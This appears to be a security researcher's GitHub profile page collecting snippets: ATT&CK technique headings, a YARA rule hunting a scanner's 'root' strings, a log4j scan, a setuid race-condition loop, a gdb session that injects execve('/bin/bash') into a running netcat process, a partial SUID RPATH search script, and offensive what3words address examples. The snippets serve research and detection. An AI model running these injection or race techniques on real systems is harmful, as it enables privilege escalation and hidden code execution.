Tim Brown timb-machine

Credential Access

T1556.003: Pluggable Authentication Modules

T1003: OS Credential Dumping

	rule pscan_or_luckscan {
	meta:
	author = "Tim Brown @timb_machine"
	description = "Hunts for references to pscan_or_luckscan"
	strings:
	$getopt = "%s <a-block> <port> [b-block] [c-block]"
	$vulnerable = "Lets try to root the %s"
	condition:
	$getopt or $vulnerable
	}

	$ ./packet-monkey.sh --type all --pcapfilename packets-hostname-xxx.pcap
	_ _ _
	_ __ __ _ ___\| \| _____\| \|_ _ __ ___ ___ _ __ \| \| _____ _ _
	\| '_ \ / _` \|/ __\| \|/ / _ \ __\|____\| '_ ` _ \ / _ \\| '_ \\| \|/ / _ \ \| \| \|
	\| \|_) \| (_\| \| (__\| < __/ \|\|_____\| \| \| \| \| \| (_) \| \| \| \| < __/ \|_\| \|
	\| .__/ \__,_\|\___\|_\|\_\___\|\__\| \|_\| \|_\| \|_\|\___/\|_\| \|_\|_\|\_\___\|\__, \|
	\|_\| \|___/

	=[ @timb_machine ]=

	$ sudo yara -r yara/log4j.yara /usr/local
	log4jjavaclass /usr/local/java/ghidra_9.1.2_PUBLIC/Ghidra/Framework/Generic/lib/log4j-api-2.8.2.jar
	log4jjavasrc /usr/local/java/ghidra_9.1.2_PUBLIC/Ghidra/Framework/Generic/lib/log4j-api-2.8.2.jar
	log4jjavaclass /usr/local/java/ghidra_9.1.2_PUBLIC/Ghidra/Framework/Generic/lib/log4j-core-2.8.2.jar
	log4jjavasrc /usr/local/java/ghidra_9.1.2_PUBLIC/Ghidra/Framework/Generic/lib/log4j-core-2.8.2.jar

	$ cat racecar.sh
	#!/bin/sh

	while :
	do
	echo "#!/bin/sh" > /Volumes/USB/a
	chmod u+xs /Volumes/USB/a
	ls -la /Volumes/USB/a \| grep sr \| grep -v 10
	done

	$ nc -v -l -p 5000 & ps -aef \| grep nc; sudo gdb /bin/nc `pgrep nc`
	timb 3976 952 0 00:22 pts/0 00:00:00 nc -v -l -p 5000
	[1] 3976
	listening on [any] 5000 ...
	(gdb) info variable environ
	All variables matching regular expression "environ":
	(gdb) print execve("/bin/bash", 0x00007f717f158118, 0)
	process 3976 is executing new program: /bin/bash
	$ ps -aef \| grep timb
	timb 3976 952 0 00:22 pts/0 00:00:00 ?.#.?.

	#!/bin/sh
	find / \( \( -perm -u+s \) -o \( -perm -g+s \) \) -a -type f 2>/dev/null \| while read SUIDFILE
	do
	LSFILE=`ls -la "$SUIDFILE"`
	objdump -x "$SUIDFILE" 2>&1\| egrep 'RPATH\|RUNPATH' \| while read name paths
	do
	if [ -n "$paths" ]; then
	echo "$paths" \| tr ":" "\n" \| while read RPATHDIR
	do
	if [ "`echo "$RPATHDIR" \| cut -c 1`" != "/" ]

	Never mind that what3words has real technical, logistical, practical limitations... Let's look at some of the dark, libellous, illegal and/or downright offensive combinations of /// addressess that their word lists can result in:

	* https://what3words.com/mistakes.cost.lives
	* https://what3words.com/troll.under.bridge
	* https://what3words.com/burn.that.school
	* https://what3words.com/lorry.catches.fire
	* https://what3words.com/shank.that.police
	* https://what3words.com/hang.puppy.quick
	* https://what3words.com/master.whips.slave
	* https://what3words.com/bullets.into.head

	T1134.004: Parent PID Spoofing

	missing from ATT&CK

	* https://magisterquis.github.io/2018/03/11/process-injection-with-gdb.html (https://github.com/timb-machine/linux-malware/issues/462), citable: False (TACTICS OR TECHNIQUES WRONG)
	* https://grugq.github.io/docs/ul_exec.txt (https://github.com/timb-machine/linux-malware/issues/463), citable: False (TACTICS OR TECHNIQUES WRONG)
	* https://gist.github.com/timb-machine/6177721c3eafba3e95abdf112b2a5902 (https://github.com/timb-machine/linux-malware/issues/461), citable: False (TACTICS OR TECHNIQUES WRONG)

	T1055.012: Process Hollowing